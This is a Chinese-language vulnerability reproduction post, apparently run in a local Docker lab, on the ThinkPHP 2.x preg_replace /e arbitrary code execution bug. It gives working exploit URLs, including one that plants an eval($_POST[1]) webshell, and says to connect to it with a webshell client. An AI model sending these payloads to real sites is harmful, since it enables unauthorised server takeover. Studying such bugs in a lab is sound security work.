ThinkPHP 2.x 任意代码执行漏洞

简介: ThinkPHP 2.x 任意代码执行漏洞

漏洞简介

ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

漏洞复现

执行如下命令启动ThinkPHP 2.1的Demo应用:

docker-compose up -d

环境启动后,访问http://your-ip:8080/Index/Index即可查看到默认页面。

http://127.0.0.1:8080/

http://127.0.0.1:8080/index.php?s=/index/index/xxx/${@phpinfo()}

http://127.0.0.1:8080/index.php?s=a/b/c/${@print(eval($_POST[1]))}

利用菜刀进行连接

参考链接

相关文章
|
6月前
|
安全 Shell PHP
渗透攻击实例-文件上传导致任意代码执行
渗透攻击实例-文件上传导致任意代码执行
|
7月前
|
监控 安全 JavaScript
某远控RCE绕过某数字的利用方式
某远控RCE绕过某数字的利用方式
164 2
|
7月前
|
SQL Web App开发 安全
Smanga未授权远程代码执行漏洞(CVE-2023-36076) 附加SQL注入+任意文件读取
Smanga存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。
169 0
|
10月前
|
开发框架 安全 PHP
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
527 0
|
10月前
|
开发框架 安全 PHP
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
833 0
|
11月前
|
安全 Oracle 前端开发
(CVE-2018-2894)Weblogic任意文件上传漏洞复现 文末附演示视频
(CVE-2018-2894)Weblogic任意文件上传漏洞复现 文末附演示视频
117 0
|
供应链 安全 IDE
RCE(任意代码执行)漏洞(CVE-2022-23205……)
RCE(任意代码执行)漏洞(CVE-2022-23205……)
|
开发框架 安全 PHP
ThinkPHP5 5.0.20 远程代码执行漏洞
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
804 0
ThinkPHP5 5.0.20 远程代码执行漏洞
|
安全 Ruby
CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞
CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞
181 0
CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞
|
安全 前端开发 PHP
thinkphp 代码执行 (CNVD-2018-24942)
thinkphp 代码执行 (CNVD-2018-24942)
187 0
thinkphp 代码执行 (CNVD-2018-24942)

热门文章

最新文章